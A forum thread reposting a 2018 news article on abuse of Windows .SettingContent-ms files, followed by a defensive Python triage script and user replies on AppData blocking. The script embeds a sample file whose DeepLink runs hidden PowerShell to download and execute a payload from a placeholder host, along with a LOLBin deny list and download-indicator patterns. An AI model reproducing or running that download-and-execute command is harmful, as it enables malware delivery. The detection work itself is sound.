steven36 Posted July 3, 2018

Malware authors are frantically trying to weaponize a new infection vector that was revealed at the start of June. The trick relies on using Windows Settings (.SettingContent-ms) shortcut files in order to achieve code execution on Windows 10 PCs.

Ever since SpecterOps security researcher Matt Nelson published his research on the matter three weeks ago, malware authors have been playing around with proof-of-concept code in attempts to craft an exploit that can deploy weaponized malware on a victim's system.

More SettingContent-ms exploits detected each day

With each passing day, more and more exploits are being uploaded on VirusTotal. FireEye security researcher Nick Carr has been avidly tracking these uploads for the past two weeks and has been documenting new findings in Twitter threads like this, this, this, this, or this.

Quote
yawn.SettingContent-ms Exploring POCs and attacker usage of a particular method like @enigma0x3's responsibly-disclosed #DeepLink technique is mostly uneventful. We'll try to keep sharing some interesting public samples as the technique trickles downstream. pic.twitter.com/zeKQdtTUpQ
— Nick Carr (@ItsReallyNick) July 3, 2018

But while previous uploads have been mostly inept tests [1, 2], in recent days crooks have also put together the first exploit chain that uses a SettingContent-ms file to actually download and install an actual malware sample. For example, according to Carr, this SettingContent-ms file will download and run an EXE file that contains the Remcos remote access trojan (RAT).
Quote
"Quotation_Request_Sheet.SettingContent-ms" #DeepLink @enigma0x3 method. 0 static AV detections in VT. Uses PowerShell to download & launch hxxps://lanitida[.]net/LAW231.exe as %APPDATA%\Rundll32.exe. Uploaded just now (2 min ago): https://t.co/2OC6vzrXyw pic.twitter.com/84oTsnE7dm
— Nick Carr (@ItsReallyNick) July 2, 2018

While you could attribute some of these VirusTotal uploads to security researchers playing around with Nelson's PoC, the discovery of a weaponized exploit suggests some malware distributors are serious about their tests and telling about their intentions.

Jérôme Segura, a Malwarebytes security researcher who also penned a blog post about the weaponized SettingContent-ms exploit that Carr discovered, told Bleeping Computer he also expects this to be integrated into live distribution campaigns. "Its name 'quotation' is very much like a lure we see in malspam," Segura said, referring to the VT upload's name of "Quotation_Request_Sheet.SettingContent-ms."

Is it OK to publish offensive hacking techniques?

But the rise in weaponized SettingContent-ms exploits uploaded on VirusTotal has also sparked discussions in the infosec community about the practice of blogging about offensive hacking tricks, like the Nelson article about the SettingContent-ms technique. You can follow the discussion via this Twitter thread, and see opinions that support keeping such techniques secret, while others argue that "security through obscurity" only helps attackers.

One of the most interesting replies in this conversation came from Justin Warner, technical director at cyber-security firm ICEBRG. "A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release," Warner said. "[A public offensive hacking technique] lures threats to predictable detection points."

Quote
A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release. Lures threats to predictable detection points. I know there is risk and other nuance, but somewhat helpful
— Justin Warner (@sixdub) July 3, 2018

Source
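A triage script for the file type discussed in the post above, as an added example that is not part of the article or of this thread: it parses a .SettingContent-ms document, pulls out the DeepLink command line the shell runs when the file is opened, and reports whether the launched program is a normal Settings deep link (control.exe or an ms-settings: URI) or a script host carrying download indicators, like the PowerShell downloader Carr describes. The two embedded sample files are constructed for this example (their layout follows the format's PCSettings/SearchableContent/ApplicationInformation/DeepLink nesting; the URL example.invalid and the payload name are placeholders), and the LOLBin allow/deny lists and indicator regex are assumptions to tune, not anything from the page.

```python
"""Triage .SettingContent-ms files by inspecting their DeepLink command line.

A Windows Settings shortcut (.SettingContent-ms) is a small XML document whose
DeepLink element normally names a control panel page. The technique discussed
above abuses the fact that the shell runs whatever command line DeepLink holds.
"""
import codecs
import re
import xml.etree.ElementTree as ET

# Script hosts and LOLBins that have no business in a Settings deep link
# (assumption for this example; extend to taste).
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
    "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe",
}

# Substrings that point at a download-and-run stage or a drop into the user
# profile, as in the PowerShell sample described in the post (assumed list).
INDICATORS = re.compile(
    r"https?:|ftp:|downloadfile|downloadstring|invoke-expression|\biex\b|"
    r"-e(nc|ncodedcommand)?\b|frombase64string|%appdata%|\$env:appdata|%temp%",
    re.IGNORECASE,
)


def extract_deeplink(xml_bytes: bytes):
    """Return the DeepLink text, or None if the file is not a usable
    SettingContent-ms document (bad XML, no DeepLink, empty DeepLink)."""
    if xml_bytes.startswith(codecs.BOM_UTF8):
        xml_bytes = xml_bytes[len(codecs.BOM_UTF8):]
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return None
    for elem in root.iter():
        # Match on the local name so the default namespace declared on
        # SearchableContent does not matter.
        if elem.tag.rsplit("}", 1)[-1] == "DeepLink":
            text = (elem.text or "").strip()
            return text or None
    return None


def launched_program(cmdline: str) -> str:
    """Lower-case basename of the program a DeepLink command line starts.

    Handles a quoted first token ("C:\\Program Files\\x\\y.exe" /q); an
    ms-settings: URI has no path separator and is returned whole.
    """
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        head = s[1:end] if end > 0 else s[1:]
    else:
        head = s.split(None, 1)[0] if s else ""
    return head.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(xml_bytes: bytes) -> dict:
    """Classify one file as benign, malicious, review or malformed."""
    deep_link = extract_deeplink(xml_bytes)
    if deep_link is None:
        return {"verdict": "malformed", "target": None, "deeplink": None,
                "reasons": ["no usable DeepLink element"]}
    target = launched_program(deep_link)
    reasons = []
    if target in LOLBINS:
        reasons.append(f"DeepLink launches {target}")
    found = sorted({m.group(0).lower() for m in INDICATORS.finditer(deep_link)})
    reasons += [f"command line contains {i!r}" for i in found]
    if reasons:
        verdict = "malicious"
    elif target == "control.exe" or target.startswith("ms-settings:"):
        verdict = "benign"
    else:
        verdict = "review"
    return {"verdict": verdict, "target": target, "deeplink": deep_link,
            "reasons": reasons}


# Constructed samples: BENIGN mirrors the layout of a stock Settings shortcut;
# MALICIOUS follows the shape of the downloader described in the post, with a
# placeholder URL and drop path.
BENIGN = rb"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\control.exe /name Microsoft.DefaultPrograms /page pageDefaultProgram</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

MALICIOUS = rb"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "$d = $env:APPDATA + '\Rundll32.exe'; (New-Object Net.WebClient).DownloadFile('https://example.invalid/payload.exe', $d); Start-Process $d"</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        result = triage(sample)
        print(f"{name}: {result['verdict']} ({result['target']})")
        for reason in result["reasons"]:
            print("   ", reason)
```

The file extension alone is the cheapest signal to block at the mail gateway; this script is for the triage step after that, where the question is what the DeepLink actually launches. Anything that is not control.exe or an ms-settings: URI comes back as "review" rather than "benign", since a legitimate shortcut has no reason to start a different program.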
straycat19 Posted July 3, 2018

Not a threat, none of the available malware samples will run on any of my systems and I have no AV software installed or active. Just good old Windows security settings.
steven36 Posted July 4, 2018

3 hours ago, straycat19 said:
Quote
Not a threat, none of the available malware samples will run on any of my systems and I have no AV software installed or active. Just good old Windows security settings.

Are you blacklisting or are you whitelisting? If you're blacklisting you're going about it the wrong way. People like you who kept talking about blacklisting AppData, specifically %AppData%\*.exe and %AppData%\*\*.exe, with the ransomware and now Cryptolocker infections, ruined it for everyone. Malware writers are starting to use other locations and/or subfolders in subfolders. Blacklisting AppData leaves you wide open for new threats and is hard to maintain. Software devs started writing anti-ransomware programs that locked down AppData for noobs, so malware writers caught on. Everything you say tips them off to change things around. Your AppData settings are not going to help you out in all cases anymore, but once your CPU goes up real high you will learn the hard way. Sometimes when it comes to these things it's better not to say anything at all. I know because I used to help people activate software; after I leaked some workaround out to the public it was just a matter of time till the dev got wind of it and changed things around, and malware writers are the same way. They are watching you, because money is at stake either way. People stopped writing viruses for fun back in the early 2000s; it's a business to them. The safest way now is to only whitelist your trusted programs in Group Policy, and if they exploit one of them you're still up shit creek if you have no real-time anti-malware with the signature. They came up with a simple bypass to CryptoLocker GPO blocking in like 2015; also there's another one called AppLocker Bypass via Registry Key Manipulation.
Archanus Posted July 5, 2018

On 7/3/2018 at 5:56 PM, steven36 said:
Quote
The trick relies on using Windows Settings (.SettingContent-ms) shortcut files in order to achieve code execution on Windows 10 PCs.

Windows 10, can you be even worse??? Every day I get more surprised, haha.
This topic is now archived and is closed to further replies.